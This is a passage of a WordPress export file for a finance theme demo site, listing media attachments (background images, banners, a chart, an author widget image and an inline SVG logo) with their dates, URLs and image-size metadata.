		<wp:meta_value><![CDATA[2020/11/bg2-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1137;s:4:"file";s:21:"2020/11/bg2-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg2-home4-300x178.jpg";s:5:"width";i:300;s:6:"height";i:178;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home4-1024x606.jpg";s:5:"width";i:1024;s:6:"height";i:606;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home4-768x455.jpg";s:5:"width";i:768;s:6:"height";i:455;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home4-1536x910.jpg";s:5:"width";i:1536;s:6:"height";i:910;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:23:"bg2-home4-1200x1137.jpg";s:5:"width";i:1200;s:6:"height";i:1137;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Full_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/04_full_white-2/</link>
		<pubDate>Thu, 12 Nov 2020 07:59:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1956</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 07:59:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 07:59:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_full_white-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/04_Full_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st0" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st0" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st0" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st0" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st0" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st0" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st0" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>author-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/author-widget/</link>
		<pubDate>Thu, 12 Nov 2020 10:16:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/author-widget.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2099</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 10:16:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 10:16:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[author-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/author-widget.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/author-widget.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:150;s:6:"height";i:150;s:4:"file";s:25:"2020/11/author-widget.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>map-footer-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_footer_builders/footer-1/map-footer-home5/</link>
		<pubDate>Fri, 13 Nov 2020 08:36:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/map-footer-home5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2141</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 08:36:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 08:36:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[map-footer-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/map-footer-home5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/map-footer-home5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:328;s:6:"height";i:199;s:4:"file";s:28:"2020/07/map-footer-home5.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:28:"map-footer-home5-300x182.png";s:5:"width";i:300;s:6:"height";i:182;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"map-footer-home5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-banner-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image-banner-home5/</link>
		<pubDate>Mon, 16 Nov 2020 03:59:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-banner-home5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2159</wp:post_id>
		<wp:post_date><![CDATA[2020-11-16 03:59:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-16 03:59:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-banner-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-banner-home5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image-banner-home5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:770;s:4:"file";s:30:"2020/11/image-banner-home5.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:30:"image-banner-home5-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"image-banner-home5-1024x411.jpg";s:5:"width";i:1024;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"image-banner-home5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"image-banner-home5-768x308.jpg";s:5:"width";i:768;s:6:"height";i:308;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"image-banner-home5-1536x616.jpg";s:5:"width";i:1536;s:6:"height";i:616;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"image-banner-home5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"image-banner-home5-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"image-banner-home5-1200x770.jpg";s:5:"width";i:1200;s:6:"height";i:770;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-project-home-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/chart-project-home-5/</link>
		<pubDate>Mon, 16 Nov 2020 10:05:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2232</wp:post_id>
		<wp:post_date><![CDATA[2020-11-16 10:05:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-16 10:05:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-project-home-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart-project-home-5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:32:"2020/11/chart-project-home-5.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"chart-project-home-5-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart-project-home-5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-5-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-5-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/image1-home5/</link>
		<pubDate>Tue, 17 Nov 2020 06:52:56 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2251</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 06:52:56]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 06:52:56]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/image1-home5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:960;s:6:"height";i:700;s:4:"file";s:24:"2020/11/image1-home5.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-home5-300x219.jpg";s:5:"width";i:300;s:6:"height";i:219;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image1-home5-768x560.jpg";s:5:"width";i:768;s:6:"height";i:560;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image1-home5-960x600.jpg";s:5:"width";i:960;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/bg1-home5/</link>
		<pubDate>Tue, 17 Nov 2020 07:46:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2269</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 07:46:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 07:46:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
